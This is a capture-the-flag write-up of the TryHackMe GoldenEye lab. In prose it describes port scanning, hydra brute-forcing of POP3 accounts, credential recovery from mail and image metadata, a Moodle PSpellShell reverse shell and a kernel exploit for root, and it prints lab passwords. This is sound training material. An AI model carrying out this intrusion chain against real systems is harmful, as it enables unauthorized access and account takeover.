5.3 KiB
TryHackMe-GoldenEye
NMAP
Nmap scan report for 10.10.81.165
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/unknown
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE TOP CAPA PIPELINING USER UIDL RESP-CODES SASL(PLAIN) STLS
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 502.67 seconds
PORT 80
Looking at source code
This is an encoded text on visting cyberchef and decoding it using magic we decoded the text
InvincibleHack3 is the password for boris
But these creds are not right
So let's enumerate different ports
PORT 55007 (POP3)
I tired to brute force with boris but failed
Earlier from the source code of the web page we saw a message that "Natalya could break your code" so maybe that's a potential username that we need to brute force so again using hydra
After some time I was able to get the correct password
Also got boris's password with the fasttrack wordlist
Boris's Mail
Here we used telnet to connect to pop3 service and logged in with boris's credentials. We can see that there are 3 messages
Message 1
### Message 2
### Message 3
Natalya's mail
We do the same with natalya's mail
Message 1
Message 2
So we found the creds and a domain , lets add the domain in /etc/hosts file
Navigate to severnaya-station.com/gnocertdir and login with xenia's credentials
Going to user's messages we can find a conversation with a user doak
We find doak's password with the same procedure
Doak's Mail
Message
Login as dr_doak on the website
This is the message we get from that text file
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
Running exiftool on it we can find a base64 encoded text
Now we are logged in as admin. One thing we can do now is look for any exploits for Moodle
Getting a reverse shell
For some reason the exploit wasn't working . I double checked everything but still it was failing
So I went with the manual exploitation of moodle
Under settings go to plugins ->Text Editors -> TinyMCE HTML editor and make sure to select Spell Engine as PSpellShell
Then make a blog post entry and click on spell check icon , if you have setup your netcat listener you'll get a shell frorm the target machine
Looking for kernel version
This is a really old kernel for linux so hopeully there will be an exploit on exploit-db
Download ,compile and transfer it to target machine
But on running it gave an error because gcc was not installed on the machine
On googling I found cc which is alternate to gcc and it was on the box
So we had to edit the exploit by replacing gcc to cc and then again transfer the compiled source code to the box
We got root !!